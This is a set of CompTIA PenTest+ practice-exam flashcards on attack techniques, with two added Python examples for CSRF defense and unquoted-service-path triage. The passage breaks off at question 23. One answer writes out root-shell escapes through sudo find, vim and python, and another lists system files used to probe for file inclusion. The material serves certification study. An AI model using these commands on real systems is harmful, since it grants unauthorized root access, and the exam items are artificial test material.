CompTIA PenTest+ Certification Practice Exam Chapter 3 (Total Sem Online Material) Flashcards

1
Q

Web fuzzing is a data validation technique used to identify flaws in websites or web applications. Which of the following is not a practice commonly used in web fuzzing?
A.Feeding garbage or unexpected data to a user data input point to elicit error messages or other information
B.Inspection of website source data to check for potentially exploitable errors or warnings
C.Tampering with URL parameters
D.Sending HTTP request methods such as HEAD or POST where another method is expected

A

B.Inspection of website source data to check for potentially exploitable errors or warnings

Explanation:
While it is common to inspect a website’s source page to check for exploitable errors or warnings, this is not a practice that can be defined as fuzzing, which at its most basic level feeds unexpected data to a website or web application to attempt to elicit an unexpected system response.

A, C, and D are incorrect. A is incorrect because feeding garbage or unexpected data to elicit error messages or other information is essentially the definition of web fuzzing. Indeed, C and D—tampering with URL parameters and sending unexpected HTTP request methods—are themselves specific examples of this task.

2
Q
On which port(s) does the Windows Remote Management interface listen?
A.TCP/5985 and TCP/5986
B.TCP/389 and TCP/636
C.TCP/139 and TCP/445
D.TCP/135
A

A.TCP/5985 and TCP/5986

Explanation:
The Windows Remote Management interface, or WinRM, listens on TCP ports 5985 and 5986, leveraging HTTP and HTTPS, respectively, for management actions.

B, C, and D are incorrect. B is incorrect because TCP ports 389 and 636 are the ports for LDAP and LDAPS (LDAP over SSL), respectively. C is incorrect because TCP ports 139 and 445 are used for NetBIOS and SMB, respectively. D is incorrect because TCP/135 is used for Microsoft’s DCOM Service Control Manager.

3
Q
During a penetration test, you determine that a wireless network in your scope is running WEP encryption. Unfortunately, there are no actively connected clients transmitting data, but the access point allows open authentication. Which of the following would be the method of attack to ultimately obtain the encryption key?
A.Fragmentation attack
B.KRACK
C.Pixie dust attack
D.Reaver attack
A

A.Fragmentation attack

Explanation:
Like the ChopChop attack, fragmentation attacks are used to obtain an XOR file; the XOR file is not the encryption key but may be used to create packets for injection into the network. A fragmentation attack repeatedly pulls fragments of the keystream from occasional packets sent by the access point. Because some of the contents of a packet are predictable to a degree (due to headers), a small portion of the keystream may be obtained by XOR-ing. This small piece of keystream may then be used to inject fragments of arbitrary data, allowing the attacker to repeat the attack and recover more of the keystream. Over a long enough time period, a complete XOR file can be built, allowing for arbitrary packet injection. At this point, the attacker can send arbitrary data to the AP (such as ARP request packets), which the AP will relay out. The attacker can collect these packets to obtain sufficient initialization vectors (IVs) to ultimately crack the WEP key with aireplay-ng. The project page for aircrack-ng has an excellent guide for this attack method; at the time of this writing, it may be found at https://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients.

B, C, and D are incorrect. B is incorrect because KRACK (or the Key Reinstallation AttaCK) is a replay attack technique that targets WPA2. By spoofing a portion of an authenticated system’s four-way handshake, an attacker is able to trick the AP and client into resetting their key data to known values, effectively causing reuse of cryptographic information. Because cryptographic information is being reused, the contents of packets are then vulnerable to decryption, allowing an attacker to view potentially sensitive information. C is incorrect because a pixie dust attack is another attack focused on WPA2 and its use of Wi-Fi Protected Setup (WPS). Since the seed values of WPS are often simple to guess or known values based on published research, the attacker can simply sniff traffic for a period of time to be able to decrypt the WPS pin and password, allowing access to the AP. D is incorrect because a reaver attack is another WPA2 attack targeting WPS. Here, the eight-digit PIN is simply guessed via brute force.

4
Q

Which of the following are examples of establishing daemon-based persistence? (Choose two.)
A.Copying the attacking system’s public SSH key into ~/.ssh/authorized_hosts
B.Creating a cronjob that attempts to establish a reverse shell to the attacking system every 15 minutes
C.Modifying the BootExecute registry key value to establish a bound shell on the victim system at boot time
D.Modifying an application that users of the compromised system are known to use frequently, such that it establishes a reverse shell callback on launch

A

B.Creating a cronjob that attempts to establish a reverse shell to the attacking system every 15 minutes
C.Modifying the BootExecute registry key value to establish a bound shell on the victim system at boot time

Explanation:
The abuse of system-executed services such as cron (which will execute user-defined cron jobs as defined in the cron table—just in the context of the user in question) and certain Windows registry keys to provide readily available shells is the defining feature of daemon-based persistence methods. In the case of B, persistence is maintained by the cron daemon; even if the reverse shell is killed manually, the cron daemon will attempt to reestablish it every 15 minutes. With C, persistence is achieved on a Windows system by establishing a bound shell whenever the server reboots, as the Session Manager (smss.exe) executes the programs listed in the Data field of the BootExecute key at boot time.

A and D are incorrect. A is incorrect because the use of SSH key-based persistence abuses a feature of SSH for persistence, rather than exploiting automated services. D is incorrect because modifying a frequently used application is not exploitation of an automated process, as it requires user interaction to provide shell access rather than such access being provided in the background and invisibly to the user.

5
Q
Which ATT&CK matrix category describes techniques used to bypass detection or other network protection mechanisms? Specific examples include bypassing UAC and deploying rootkits.
A.Initial access
B.Lateral movement
C.Persistence
D.Defense evasion
A

D.Defense evasion

Explanation:
Defense evasion techniques described in the ATT&CK matrix are ultimately aimed toward evading detection or other network defenses. In the examples provided, bypassing UAC allows attackers to execute commands in an administrative context on Windows systems without a UAC alert notifying users, while rootkits hide the presence of malware by intercepting core operating system calls that supply key system information.

A, B, and C are incorrect. A is incorrect because initial access techniques are used to gain initial footholds into a target network. Examples of this include spearphishing and abuse of trusted relationships with outside organizations. B is incorrect because lateral movement techniques facilitate an attacker’s movement throughout a target organization’s network, allowing access to and control of additional systems. Examples of this include pass-the-hash and pass-the-ticket attacks. C is incorrect because persistence techniques consist of any access, action, or configuration changes that enable an attacker to ensure they can retain a presence on the system. Examples of this include modification of user .bash_profile files and new account creation.

6
Q
Popularly exploited by the Conficker worm, which vulnerability relies on a buffer overflow in the Microsoft Server service to achieve remote code execution on Windows 2000, XP, and Server 2003?
A.DoublePulsar
B.MS08-067
C.EternalSynergy
D.MS15-127
A

B.MS08-067

Explanation:
MS08-067 describes the vulnerability at the heart of the Conficker worm and relies on a buffer overflow in the Windows Server service, which handles remote procedure calls.

A, C, and D are incorrect. A is incorrect because DoublePulsar is a backdoor implant payload frequently used with other exploits, rather than a vulnerability. C is incorrect because EternalSynergy is an exploit (rather than a vulnerability) that targets SMBv1 with a buffer overflow to achieve code execution. D is incorrect because MS15-127 is a vulnerability that targets Microsoft DNS rather than its Server service to achieve remote code execution; in addition, MS15-127 was not leveraged by the Conficker worm.

7
Q
During a penetration test, you discover that HTTP parameters are contained in the URL in plaintext with no obfuscation in a web application. You find that by changing the “?OrderNumber=12345” component of the URL to “?OrderNumber=XXXXX”, you are able to gain access to orders you would not otherwise be able to see. This is an example of what type of vulnerability?
A.HTTP parameter pollution
B.Unvalidated redirection
C.Persistent XSS
D.Insecure direct object reference
A

D.Insecure direct object reference

Explanation:
The vulnerability in question is an example of an insecure direct object reference, and is shown through two facts: First, the use of a query (denoted by the “?” operator) tells us that the browser is sending the information that follows to the web server. Second, the use of the term “OrderNumber” in plaintext with a simple five-digit value suggests that the web server simply takes a client’s word for it when they say they have authorization to view a file. This class of vulnerability is best remedied by validating private object references and verifying authorization to all such referenced objects.

A, B, and C are incorrect. A is incorrect because HTTP parameter pollution would consist of sending specially crafted HTTP requests that contain multiple instances of an HTTP parameter with different values for the purpose of fuzzing a website or web application. HTTP parameter pollution is typically a complex enough issue to require manual testing, and different web servers will handle multiple identically named HTTP parameters differently. The results of parameter pollution can range from simple error messages to authentication or input validation bypasses. B is incorrect because the vulnerability described in the question produces information disclosure on the same website rather than redirecting the user to a different, malicious site. Unvalidated redirection would require that an attacker craft a malicious link to the vulnerable site, which then redirects the victim to a site of the attacker’s choosing, typically for the purpose of a phishing campaign or XSS attack. C is incorrect because the vulnerability described does not result in malicious code being served by the hosting server, as persistent XSS occurs when malicious code is embedded into a website that is visited by the victim. Additionally, persistent XSS targets the information held in the visitor’s browser (by getting the user to transfer information such as session tokens or other sensitive information) rather than the web server itself.

8
Q
Which technique is marked by overwriting a program’s execution stack with “no operation” instructions, with an end goal of shifting a program’s instruction pointer to a specific command sequence? It is used extensively in the development of buffer overflow attacks.
A.Return-oriented programming
B.Ret2libc
C.Stack smashing
D.NOP sled
A

D.NOP sled

Explanation:
The technique described is a NOP sled (also called a NOP slide or NOP ramp). A NOP instruction indicates that no action should be taken by a processor during the execution of a program, effectively sliding the instruction pointer further down the stack until it reaches an instruction that can be acted upon.

A, B, and C are incorrect. A is incorrect because return-oriented programming is a category of attack used to achieve arbitrary code execution in spite of existing defenses such as code signing and executable space protection. Briefly, return-oriented programming seeks to gain control of a program’s execution flow and then employ instruction sequences already present in memory. Since return-oriented programming is an attack type rather than a specific technique used to slide the instruction pointer along, this answer is incorrect. B is incorrect because ret2libc attacks are a specific type of return-oriented programming that attempts to leverage an existing library function in memory to obtain code execution rather than deploying a custom-written payload. As with the broader category of return-oriented programming, this is a category of attack rather than a specific technique used in the attack, making this answer incorrect as well. C is incorrect because stack smashing is a specific type of buffer overflow attack that occurs when data is written to memory addresses on a program’s call stack, taking up more storage space than the intended data buffer is meant to contain. Since stack smashing is a type of buffer overflow attack rather than a technique used in the development of buffer overflow attacks, this answer is incorrect.

9
Q
During preparation for a phishing campaign, you identify a critical business web application that does not verify the target of a redirect included in an HTTP GET parameter. You choose to create links that route to the legitimate web service but redirect to your attacking system where you are hosting a cloned version of the application’s login page that will harvest user credentials. This is an example of what type of vulnerability?
A.Reflected XSS
B.Unvalidated redirection
C.HTTP parameter pollution
D.Unauthorized API use
A

B.Unvalidated redirection

Explanation:
Unvalidated redirection occurs when untrusted input is accepted by a web application in such a way that it can cause a visitor to be redirected to another site. If an attacker leverages this and links to a malicious site of their own creation, this attack could be a critical component of a successful phishing campaign, as phishing victims are more likely to trust a link that appears to be part of a site they visit frequently.

A, C, and D are incorrect. A is incorrect because reflected XSS would require a user to be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim, without storing it locally. In this instance, a malicious link is crafted and sent directly to the user, after which the intended site is loaded before redirecting the visitor to a cloned site under the attacker’s control for the purpose of harvesting credentials. As such, this answer is incorrect. C is incorrect because HTTP parameter pollution would require the attacker to fuzz the target web server with HTTP requests that have multiple instances of the same HTTP parameter, rather than sending a malicious link to the victim, as in the example. Recall that HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name. Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses. D is incorrect because unauthorized API use would involve the use of a feature or interface not intended for typical end users. In this case, a standard feature (an HTTP redirect) is abused due to a lack of sanitization of user input before the redirect is processed, making this answer incorrect as well. As a refresher, unauthorized or unexpected API use can come up for numerous reasons: developers may have left a feature enabled when pushing an application into an environment, development and production environments may not be properly segregated, or developers and administrators may just find it convenient to have the functionality of the API in question available at all times.

10
Q
Which of the following attack vectors is best defined as tricking an application into loading a malicious library file by exploiting the documented library search order paths?
A.DLL hijacking
B.DLL injection
C.LSASS dumping
D.Unquoted service path abuse
A

A.DLL hijacking

Explanation:
DLL hijacking occurs when an application is manipulated into loading a malicious DLL file by exploiting the documented search path for DLL files as followed by Windows. Compare this with DLL injection, explained next.

B, C, and D are incorrect. B is incorrect because DLL injection is a technique wherein a running service is manipulated into loading a library file—but rather than abusing the default DLL lookup paths as documented by Microsoft, as with DLL hijacking, this is accomplished through means such as the SetWindowsHookExA function in the Windows API, or through modification of registry values that define the standard DLLs loaded into user processes. In other words, hijacking relies on normal Windows behavior to trick an application into loading a malicious library, whereas injection forcibly causes the application in question to load a malicious library. C is incorrect because LSASS dumping does not rely on getting a process to load a malicious library file. Rather, LSASS dumping occurs when an attacker obtains a memory dump of the LSASS.exe process on a Windows system. If the .dmp file produced is fed into Mimikatz or parsed manually, plaintext passwords can be retrieved for all user accounts on the system. D is incorrect because unquoted service path abuse becomes possible when a service managed via the Windows Service Control Manager has a space somewhere in the path to the executable and the path string is not encased with quotation marks. While this is likely to cause Windows to load library files that it would not otherwise load, the feature being exploited is the method Windows uses to find a service executable rather than the library search paths, making this answer incorrect.

11
Q
Which of the following tools is best suited for routing penetration testing traffic between a network accessible to a penetration tester and another that cannot be accessed directly?
A.Proxychains
B.Responder
C.Process Explorer
D.RDP
A

A.Proxychains

Explanation:
Proxychains is used to route any network traffic through an established SOCKS proxy. It simplifies the process of scanning and attacking networks that a penetration tester may not otherwise be able to access directly.

B, C, and D are incorrect. None of these options is capable of proxying arbitrary traffic to remote networks otherwise inaccessible to an attacker. B is incorrect because Responder is an LLMNR, NBT-NS, and mDNS poisoner with a built-in rogue authentication server. C is incorrect because Process Explorer is a component of Microsoft’s Sysinternals suite that provides a greatly enhanced task manager and system monitor that can be used in system troubleshooting and debugging. D is incorrect because RDP (Remote Desktop Protocol) is a remote access protocol that enables users to obtain graphical desktop sessions across networks.

12
Q

Consider an /etc/hosts file with hundreds of entries similar to the following:

10.10.1.2 host.domain.com host

Of the following options, which would be the best choice to create a text file containing a list of IP addresses?
A.grep 10. /etc/hosts >> ips.txt
B.awk {'print $2'} /etc/hosts > ips.txt
C.awk {'print $1'} /etc/hosts >> ips.txt
D.grep -v domain.com /etc/hosts >> ips.txt

A

C.awk {'print $1'} /etc/hosts >> ips.txt

Explanation:
The print function in awk can be used to extract specific columns of text as delineated by whitespace (that is, spaces or tabs), or by any other delimiter character when used with the -F flag. The >> operator is used to append output to the named file rather than overwrite the entire file each time matching data is found.

A, B, and D are incorrect. A is incorrect because the use of grep would pull the entire line any time a match for “10.” was found, rather than just the IP address in question. B is incorrect because the use of {'print $2'} in awk would print the second field of text—usually a hostname or FQDN in a hosts file—rather than the IP addresses. D is incorrect because the use of grep would pull whole lines rather than individual fields of data before feeding them into the text file. In addition, the -v flag would provide matches for all lines that did not contain the string “domain.com”, leaving only lines which did not contain an FQDN.

13
Q
Which of the following general privilege escalation vectors is applicable to Windows hosts? (Choose two.)
A.SUID/GUID program abuse
B.Unattended installation artifacts
C.Insecure sudo use
D.DLL hijacking
A

B.Unattended installation artifacts
D.DLL hijacking

Explanation:
The collection of artifacts from unattended operating system installations and DLL hijacking are both categories of privilege escalation techniques that target Windows operating systems.

A and C are incorrect. SUID/GUID program abuse and insecure sudo access are privilege escalation vectors used in attacking *nix operating system families.

14
Q
Which of the following are common targets used to test for local file inclusion vulnerabilities? (Choose two.)
A./etc/shadow
B.Windows\System32\config\SAM
C./etc/passwd
D.Windows\System32\drivers\etc\hosts
A

C./etc/passwd
D.Windows\System32\drivers\etc\hosts

Explanation:
The passwd file in *nix operating systems and the hosts file in Windows operating systems are some of the more common candidates for initial LFI tests, as they are world-readable and can provide some further enumeration of the system in question (system users in the case of the passwd file in *nix environments, and frequently visited remote systems in the case of the hosts file for Windows).

A and B are incorrect. The shadow files in *nix operating systems and SAM files in Windows operating systems are expected to be locked behind root or administrative access, respectively, for security reasons; while it is not unheard of to encounter a web server running as a root or administrative user, it is still a rare occurrence, making it a more productive use of time to test with files that should be accessible by all users first.

15
Q

Spanning Tree Protocol is a link layer network protocol that ensures there are no switching loops in a series of connected Layer 2 networks. Triggering repeated election broadcasts can prevent hosts on the network from requesting information needed for legitimate communications, as all their bandwidth is ultimately absorbed in nominating root bridges for the local link. Why is this not an avenue of attack that should be considered by a penetration tester?
A.The technique effectively halts testing of any further targets, thereby preventing the penetration tester from fully assessing the target network or the related goals, such as privilege escalation or lateral movement.
B.Denial of service methods often only last as long as the attacker focuses their resources on the attack, essentially wasting billable hours that could be better spent performing other tasks.
C.Denial of service attacks are destructive, focusing solely on disruption of legitimate use of services, which can effectively halt business operations for a client organization
D.All of the above

A

D.All of the above

Explanation:
Each of the answers listed details a different reason that this attack vector (and more broadly, DoS attacks in general) is ill-advised without extensive coordination with the client. Denying service to others also necessarily involves denying service to yourself as a penetration tester, preventing you from conducting any further activities that would achieve the goals of the penetration test. In addition, these efforts are often time sinks that consume valuable testing time that could be spent trying to find another means of ingress to a target network. Arguably most important, however, is the fact that DoS attacks can halt legitimate business activity on client networks and systems. Penetration testing should be conducted with the aim of identifying and verifying vulnerabilities, rather than simply exploiting vulnerabilities for its own sake without regard to the client’s need to conduct business during the penetration test. In the case of DoS vulnerability testing and verification, it should generally be conducted only when explicitly called for in the RoE, or in close coordination with the client through the listed point of contact. Otherwise, it is generally best to simply document the vulnerability and press on to other issues.

A, B, and C are incorrect. All of these are good reasons not to blindly conduct DoS testing of targets during a penetration test, making them incorrect answers, as “All of the above” is the best fit for this question.

16
Q
Which of the following utilities can be used to effect privilege escalation in a Linux environment if the current user has access to run them as root?
A.vim
B.find
C.python
D.All of the above
A

D.All of the above

Explanation:
All of the commands listed can be abused to obtain a root system shell in the event that a user has root access to them (either via sudo or a root SUID bit). In the case of vim, this is accomplished by viewing any file (for example, sudo vim /etc/hosts) and entering the command sequence !sh in vim’s normal mode (rather than insert mode, which is used when entering text). Normal mode is the typical default starting mode for vim. With find, the abuse stems from the -exec option; if the searched file is found, any given command can be executed since the command is run from a root context. An example of this is sudo find /etc/hosts -exec /bin/sh \;. With python, privilege escalation can be achieved by invoking the same command sequence that is often used to escape a chroot jail—for example, sudo python -c 'import pty;pty.spawn("/bin/sh")'. Note that this is not by any means an exhaustive list of commands vulnerable to sudo abuse; other such vulnerable commands include (but are not limited to) less, more, awk, or older versions of nmap (up to 5.21). Any command that can be run as root is worth investigating as a penetration tester.

A, B, and C are incorrect. All these commands can be effectively abused to provide privilege escalation when they can be run as root.

17
Q
During a penetration test, you determine that there are very few ports available for movement and data transfer that are not being blanket denied by the target organization’s firewalls. You elect to smuggle data out of the target network by embedding it into DNS requests. This is an example of what ATT&CK technique?
A.Exfiltration over alternative protocol
B.Exfiltration over physical medium
C.Process discovery
D.Data from removable media
A

A.Exfiltration over alternative protocol

Explanation:
The use of DNS as an exfiltration vector abuses the necessity of legitimate DNS traffic in a network, allowing for data to be taken from a target system.

B, C, and D are incorrect. B is incorrect because exfiltration over a physical medium would be best represented by transferring stolen data to removable media, such as USB drives or cell phones, rather than through abuse of a network protocol, as in the example. C is incorrect because process discovery is a discovery tactic unrelated to data exfiltration. D is incorrect because data from removable media refers to a data collection tactic rather than anything related to data exfiltration.

18
Q
Which cryptographic side-channel attack exploits the delay in volatility in system RAM after a hard reboot, and is frequently used to target encryption keys that were sitting in memory on the target system?
A.Cold boot attack
B.JTAG debugging
C.Serial connections
D.Timing attack
A

A.Cold boot attack

Explanation:
A cold boot attack exploits the delay in volatility in system RAM after a hard reboot, and is frequently used to target encryption keys that were sitting in memory on a target system.

B, C, and D are incorrect. B is incorrect because JTAG debugging leverages the IEEE standard used to test printed circuit boards to obtain elevated access to a device; since this is not a side-channel attack and does not exploit RAM volatility delay, this answer is incorrect. C is incorrect because serial connections are communication interfaces used to transfer information to and from various devices, such as a modem or terminal; since this is not a side-channel attack, but rather abuse of a known standard connection mechanism, this answer is incorrect. D is incorrect because a timing attack is a cryptographic side-channel attack that is based on measuring the time required for computations to complete; since all computations take time, and the time required varies directly based on input, an attacker is able to observe the time to completion for information they would like to harvest and then compare the time expended to values based on known inputs. While this is a side-channel attack, it does not exploit the delay in the volatility of system memory, making this answer incorrect as well.

19
Q

Which of the following commands will display general firewall configuration rules on a target system running the appropriate firewall service? (Choose two.)
A.iptables -S
B.netsh firewall show config
C.netsh advfirewall firewall show rule name=all
D.ufw list

A

A.iptables -S
C.netsh advfirewall firewall show rule name=all

Explanation:
On a Linux system running iptables, the command iptables -S will display currently loaded firewall configuration rules. Similarly, the command netsh advfirewall firewall show rule name=all will do the same on a Windows host.

B and D are incorrect. B is incorrect because the command listed here will only display the running state of the firewall on a Windows host; while this is valuable information, it does not give granular rules as stated in the question. D is incorrect because list is not a valid subcommand for ufw, which serves as a more easily accessible frontend for iptables on Linux hosts. ufw status will return the firewall state and loaded rules if the firewall service is running.

20
Q
Which attack occurs when an attacker is able to trick a victim into performing unexpected actions on a web application to which they are presently authenticated?
A.Code injection
B.DOM-based XSS
C.Cross-site request forgery
D.Local file inclusion
A

C.Cross-site request forgery

Explanation:
The attack described is a cross-site request forgery (CSRF), wherein an application’s trust of a given client (based on the session cookie the browser attaches automatically to every request for that site) is exploited to execute changes that are not intended by the user in question. Although the target of a CSRF attack is the server, the attack is necessarily initiated by the abuse of the authenticated victim’s session (perhaps via a well-crafted link in a phishing e-mail, or a hidden auto-submitting form on a page the victim visits), making this a client-side attack. The standard defenses are anti-CSRF tokens tied to the session, the SameSite cookie attribute, and checking the Origin header on state-changing requests.

A, B, and D are incorrect. A is incorrect because code injection would involve an attacker abusing an application system call that relies on unsanitized user input, rather than tricking a user into performing an action they otherwise would not have taken, as described in the question. In other words, since the attack described is not executed against the web server by the attacker directly, and instead relies on abuse of the user’s authenticated session, this answer is incorrect. B is incorrect because DOM-based XSS is a client-side attack that targets the victim’s browser rather than the remote server. Since the attack described is targeting a function found on the remote server rather than data or code execution in the user’s browser, this answer is incorrect. Recall that DOM-based XSS attacks are contained in the Document Object Model (DOM), which is part of the environment of a victim’s browser. This attack method frequently abuses parts of the URI (uniform resource identifier) such as the fragment after #, which the browser never sends to the web server but which client-side script may read and write into the page; this allows attackers to perform various actions, such as stealing a user’s session cookies. D is incorrect because local file inclusion would show through the disclosure of a file on the web server that would ordinarily not be accessible. The attack described instead tricks a user into performing an action they would otherwise be unlikely to perform. Since no disclosure of a local file is described, this answer is incorrect.
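As an added example (not part of the original flashcards), the following Python models the server-side check that defeats the attack described above: a per-session anti-CSRF token bound to the victim's session with an HMAC and compared in constant time, plus an Origin/Referer check on every state-changing request. There is no web framework here; the secret key, site origin, session id and request dictionaries are constructed for the demonstration.

```python
"""Synchronizer-token CSRF defense, modelled without a web framework.

Added example. Requests are plain dictionaries; the secret key and the
allowed origin are constructed values for the demonstration.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # must never change server state


class CsrfGuard:
    def __init__(self, secret: bytes, site_origin: str) -> None:
        self.secret = secret
        self.site_origin = site_origin  # e.g. "https://bank.example"

    def _mac(self, session_id: str, nonce: str) -> str:
        msg = f"{session_id}:{nonce}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue_token(self, session_id: str) -> str:
        """Mint a token that is only valid for this session.

        Format: nonce.MAC where MAC = HMAC-SHA256(secret, session_id:nonce).
        An attacker who knows the victim is logged in still cannot forge a
        token without the server secret and the victim's session id, and a
        token leaked from the attacker's own session does not transplant.
        """
        nonce = secrets.token_hex(16)
        return f"{nonce}.{self._mac(session_id, nonce)}"

    def token_is_valid(self, session_id: str, token: str) -> bool:
        try:
            nonce, mac = token.split(".", 1)
        except ValueError:
            return False
        # constant-time compare so the MAC cannot be guessed byte by byte
        return hmac.compare_digest(mac, self._mac(session_id, nonce))

    def _origin_matches(self, headers: dict) -> bool:
        """Reject if the browser says the request came from another site."""
        src = headers.get("Origin") or headers.get("Referer")
        if not src:
            # strict: a state change with neither header is treated as forged
            return False
        parts = urlsplit(src)
        return f"{parts.scheme}://{parts.netloc}" == self.site_origin

    def request_is_allowed(self, method: str, headers: dict,
                           form: dict, session_id: str) -> bool:
        """Decide whether a (possibly forged) request may change state."""
        if method.upper() in SAFE_METHODS:
            return True  # safe by contract: GET must not perform actions
        if not self._origin_matches(headers):
            return False
        return self.token_is_valid(session_id, form.get("csrf_token", ""))
```

The phishing-link scenario in the explanation only works if the application performs the action on a GET; the guard above waves safe methods through, so the contract that GET never changes state is part of the defense. SameSite=Lax or Strict on the session cookie is a complementary control that stops the browser from attaching the cookie to cross-site POSTs in the first place.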

21
Q
Which family of attack is used to obtain control of the operation of Bluetooth-enabled devices?
A.Bluesnarfing
B.Bluebugging
C.Jamming
D.Pixie dust
A

B.Bluebugging

Explanation:
Bluebugging exploits weaknesses in a device’s Bluetooth implementation to get the attacking system accepted (or kept) as a trusted, paired device, allowing the attacker to issue commands and assume control of the victim device’s operation, for example placing calls, sending messages, or reading the phonebook. Modern Bluetooth implementations have numerous security checks in place to prevent this type of attack, such as firmware fixes and the requirement of a PIN or Secure Simple Pairing confirmation to complete pairing. As with WPA-PSK, legacy (pre-2.1) PIN-based pairing can still be defeated if an attacker captures the pairing exchange, allowing the PIN to be recovered offline.

A, C, and D are incorrect. A is incorrect because bluesnarfing is the use of vulnerabilities in a device or in Bluetooth to steal information, such as phone numbers, SMS message contents, or calendar information, but does not imply or require control over the target, as stated in the question. C is incorrect because jamming attacks are those that attempt to render a wireless protocol unusable, usually by flooding the wireless spectrum used by the target protocol with additional transmissions and degrading the signal-to-noise ratio. Thus, jamming attacks are a form of denial of service attack, which cannot be used to seize control of a device, making this an incorrect answer. D is incorrect because a pixie dust attack is one aimed at cracking the PIN used in WPS-enabled Wi-Fi routers, with the ultimate goal of enabling an attacker to connect to and authenticate with a wireless AP; since this attack targets 802.11 Wi-Fi networks rather than Bluetooth connections, it is incorrect.

22
Q

Which of the following services is most likely to be exploitable in a Windows environment as a low privilege user? Assume that all services listed are run as an administrative user or SYSTEM.
A.C:\WINDOWS\system32\lsass.exe
B.C:\Program Files (x86)\Vendor\Core Services\app.exe
C.C:\Program Files\application_name\bin\application2.exe
D.“C:\Program Files (x86)\Vendor_2\app binaries\app.exe”

A

B.C:\Program Files (x86)\Vendor\Core Services\app.exe

Explanation:
The presence of whitespace in an unquoted service path for an application running as an administrator or SYSTEM makes the service vulnerable to unquoted service path privilege escalation: the service control manager tries each space-delimited prefix of the path, with .exe appended, before reaching the intended binary. In this case, creating a malicious executable named Core.exe and placing it in the C:\Program Files (x86)\Vendor directory would cause the malicious file to be run as SYSTEM on system startup or when the service in question is restarted. This presumes that the Vendor directory is writable by the low privilege user (check with icacls), which is common for vendor-created directories but not guaranteed. Note that while there is also whitespace in the “C:\Program Files (x86)” parent directory, the C:\ root directory has write protections in place by default that would prevent a low privilege user from writing C:\Program.exe or C:\Program Files.exe there.

A, C, and D are incorrect. A is incorrect because the path listed is for the Local Security Authority Subsystem Service, which is a protected and critical core Windows feature. In addition to the lack of whitespace in the service path, the C:, C:\WINDOWS, and C:\WINDOWS\system32 directories are all write-protected directories, preventing low privileged accounts from making modifications without authorization. C is incorrect because the path listed only contains one instance of whitespace—in the C:\Program Files directory, which is saved in the C:\ parent directory. Since write protections are enabled by default at the root C:\ directory, the creation of a malicious C:\Program.exe file would not be possible for a low privilege user, removing this as a candidate for privilege escalation from the choices present. D is incorrect because although there is a potential location to place a malicious binary—at C:\Program Files (x86)\Vendor_2, with the binary named app.exe—the path is wrapped in quotes, ensuring that the service manager will follow the stated path all the way to the end, rather than executing the first .exe file it finds.
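To make the search order concrete, here is an added Python example (not from the flashcards) that computes every path the service control manager may try for an unquoted service path and triages an inventory of services for exploitable drop locations. The service entries, the account names and the set of user-writable directories are constructed to mirror the four answer choices; on a real host the paths come from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (for example via wmic service get name,pathname,startmode) and the directory permissions from icacls.

```python
r"""Triage Windows services for unquoted service path hijacks.

Added example. Service entries and writable directories are constructed;
on a real host read ImagePath from the registry (or wmic/Get-CimInstance)
and check each candidate's parent directory with icacls.
"""
import ntpath
from dataclasses import dataclass, field

PRIVILEGED_ACCOUNTS = {"localsystem", "nt authority\\system", "administrator"}


@dataclass
class Service:
    name: str
    image_path: str   # raw ImagePath value, quoted or not
    runs_as: str      # service logon account
    # Directories the low-privilege user can write to (constructed input).
    writable_dirs: set = field(default_factory=set)


def unquoted_candidates(image_path: str) -> list[str]:
    r"""Paths the service control manager may execute *before* the real one.

    CreateProcess parses an unquoted command line by trying each
    space-delimited prefix as the executable name with .exe appended:
    'C:\Program Files (x86)\Vendor\Core Services\app.exe' yields
    C:\Program.exe, C:\Program Files.exe, ...\Vendor\Core.exe and only
    then the intended file. A quoted path is taken literally.
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    words = path.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def hijack_points(svc: Service) -> list[str]:
    """Candidates whose parent directory the low-privilege user can write."""
    writable = {d.lower().rstrip("\\") for d in svc.writable_dirs}
    return [c for c in unquoted_candidates(svc.image_path)
            if ntpath.dirname(c).lower().rstrip("\\") in writable]


def triage(services: list[Service]) -> dict[str, list[str]]:
    """Map service name -> exploitable drop locations, privileged services only."""
    out = {}
    for svc in services:
        if svc.runs_as.lower() not in PRIVILEGED_ACCOUNTS:
            continue  # hijacking a service that runs as us gains nothing
        points = hijack_points(svc)
        if points:
            out[svc.name] = points
    return out


# Constructed inventory mirroring the four answer choices; only the Vendor
# and Vendor_2 directories are assumed writable by the low-privilege user.
SAMPLE_SERVICES = [
    Service("SamSs", r"C:\WINDOWS\system32\lsass.exe", "LocalSystem"),
    Service("VendorCore", r"C:\Program Files (x86)\Vendor\Core Services\app.exe",
            "LocalSystem", {r"C:\Program Files (x86)\Vendor"}),
    Service("AppSvc", r"C:\Program Files\application_name\bin\application2.exe",
            "LocalSystem"),
    Service("Vendor2", r'"C:\Program Files (x86)\Vendor_2\app binaries\app.exe"',
            "LocalSystem", {r"C:\Program Files (x86)\Vendor_2"}),
]

if __name__ == "__main__":
    for name, points in triage(SAMPLE_SERVICES).items():
        print(name, "->", points)
```

Two caveats when running this against real data: an ImagePath may carry arguments after the executable, which this parser treats as part of the path (inspect those by hand), and a writable parent directory is necessary but not sufficient, since the service must also be restartable by the low-privilege user or the host must reboot.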

23
Q
Which of the following Group Policy attributes is most likely to allow privilege escalation when found in files on a target Windows system?
A.changeLogon
B.neverExpires
C.acctDisabled
D.cpassword
A

D.cpassword

Explanation:
